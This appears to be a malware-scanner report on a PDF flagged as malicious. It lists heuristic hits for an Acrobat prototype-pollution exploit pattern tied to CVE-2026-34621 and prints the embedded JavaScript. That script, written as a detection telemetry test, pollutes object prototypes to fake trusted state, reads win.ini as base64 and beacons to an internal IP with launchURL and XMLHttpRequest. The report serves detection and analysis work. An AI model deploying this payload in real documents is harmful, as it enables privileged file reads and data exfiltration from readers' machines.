Verdict: MALICIOUS
Risk score: 174

Machine learning
- Nyx PDF Classifier malicious score 0.9994

Heuristics (7)
- Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related (critical, tagged "CVE likely", rule CVE_2026_34621_RELATED): PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
- JavaScript action (low, 4 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Prototype-pollution JavaScript pattern (high, rule PDF_JS_PROTOTYPE_POLLUTION): PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript issues an HTTP request on open (low, rule PDF_JS_NETWORK_BEACON): Embedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage). Matched line in script: `try { var x = new XMLHttpRequest(); x.open("GET", "http://192.168.1.100/beacon2", false);`
- PDF JavaScript opens or fetches a remote URL/document (low, rule PDF_JS_REMOTE_DOC_FETCH): Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads. Matched line in script: `try { app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true); } catch(e1) {}`
- Embedded URL (info, rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://192.168.1.100/cve-2026-34621-beacon (referenced by PDF JavaScript)
  - http://192.168.1.100/beacon2 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xC7 | 888 bytes |

SHA-256: c29b5f405c84012c9060fca049c5f279d22730475e17c21232b93610afbf0f63
Preview script (first 1,000 lines of the extracted script):

```javascript
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}
// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}
// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}
// Test 3: collab/SOAP outbound (alternate network path)
try {
var x = new XMLHttpRequest();
x.open("GET", "http://192.168.1.100/beacon2", false);
x.send();
} catch(e3) {}
app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0004_001.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE8 | 1161 bytes |

SHA-256: 597d5f794aecc980716bc1279aad0a6c5e316447095ae18d8f2f0f1600bf50f2
Preview script (first 1,000 lines of the extracted script; the carve runs past the end of the JS stream into the trailing PDF objects, xref table and trailer, which is why this artifact is larger than the first):

```javascript
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}
// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}
// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}
// Test 3: collab/SOAP outbound (alternate network path)
try {
var x = new XMLHttpRequest();
x.open("GET", "http://192.168.1.100/beacon2", false);
x.send();
} catch(e3) {}
app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
endstream
endobj
5 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
xref
0 6
0000000000 65535 f
0000000015 00000 n
0000000082 00000 n
0000000139 00000 n
0000000199 00000 n
0000001138 00000 n
trailer
<< /Size 6 /Root 1 0 R >>
startxref
1209
%%EOF
```